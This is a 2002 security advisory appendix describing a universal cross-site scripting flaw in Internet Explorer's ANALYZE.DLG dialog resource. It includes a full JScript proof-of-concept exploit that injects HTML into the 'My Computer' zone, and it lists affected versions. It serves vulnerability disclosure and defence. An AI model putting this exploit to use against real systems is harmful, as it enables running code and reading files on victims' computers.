GreyMagic Security Advisory Appendix GM#001-AX
By GreyMagic Software, Israel.16 Apr 2002.
Topic: Appendix to "IE allows universal Cross Site Scripting".
Introduction:Thor Larholm has discovered a vulnerability in the implementation of dialogs in Internet Explorer.
However, his demonstration is confined to IE6 because the resource he found to be exploitable first appeared in IE6 (privacy policy).
Discussion:We have found an exploitable resource that was shipped as early as IE5.
"shdoclc.dll" also contains an "ANALYZE.DLG" resource, which is not as easy to exploit as the policy error files in IE6, but a bit of manipulation gets us the same results.
"ANALYZE.DLG" seemed to be programmed with surprising care, using insertAdjacentText where "unsafe" content may appear instead of innerHTML or insertAdjacentHTML.
However, there is one place where the programmer didn't take enough caution, line 187 contains (comments added to explain the code):
// Expected to return an array of <link> elements.
// theDocument variable used in this line is the document property of the
// argument sent to the dialog, an expected window object.
links = theDocument.all.tags("link");
// Sends the array for inspection by another function
retVal = checkLinkReadyStateComplete(links, reportLocation);
And inside the function checkLinkReadyStateComplete:
if (objects == null)
return retVal;
for (i=0; i < objects.length; i++) {
element = objects(i);
if (element.rel.toLowerCase() == "stylesheet"
|| element.rel.toLowerCase() == "alternate stylesheet")
{
if (element.readyState != "complete" && element.readyState != 4) {
reportLocation.insertAdjacentHTML("BeforeEnd", L_StyleSheetNotInstalled_Text + element.href + "<BR><hr>");
retVal = true;
}
}
}
The problem is, of course, in line 205, a dangerous concatenation inside a call to insertAdjacentHTML.
Update (16-May-2002):Microsoft released a patch for this vulnerability. However, the patch is incomplete. It only patches IE6 and leaves IE5 and IE5.5 vulnerable.
Exploit:
<script language="jscript">
// HTML to be injected (will run in the "My Computer" zone)
var sHTML="<b>We're in!</b>";
// Object to return from tags("link"), must be a function because they use
// objects(i) instead of objects[i], VB style collection access.
function oExploit(iSec) {
return {
// Satisfy line 201
rel:"stylesheet",
// Satisfy line 204
readyState:"exploit",
// Exploit line 205
href:sHTML
};
}
// A length property so it will enter the loop
oExploit.length=1;
// A fake window object, so no errors will be raised during the process,
// the custom "tags" method will return an empty array for any element
// other than our target (<link>), in which case it will return the oExploit
// object above.
var oSecurity={
document:{
all:{
tags:function (sTag) {
return sTag=="link" ? oExploit : [];
}
}
}
}
// Run exploit, getFile.asp redirects to res://shdoclc.dll/analyze.dlg
// and oSecurity (fake window) is sent as the dialog argument.
showModelessDialog("getFile.asp",oSecurity);
</script>
IE5 NT4.
IE5.5 NT4.
IE6 Win2000.
- Display location
- Run the calculator
- Run notepad
- Run
- Read
IE5 acts very strangely with this exploit, it works SOMETIMES, a few reloads usually get it to run properly. It seems to have a moral issue with redirecting to res:// files.
IE5.5 and IE6 both run it smoothly.
Disclaimer:The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.
Vulnerability details are provided strictly for educational and defensive purposes.
GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
Stay informed:Subscribe to GreyMagic's early notification email service and be informed of new vulnerabilities and updates as soon as they appear on the site.
Press here to subscribe.
Your privacy is important to us, read our Privacy Statement.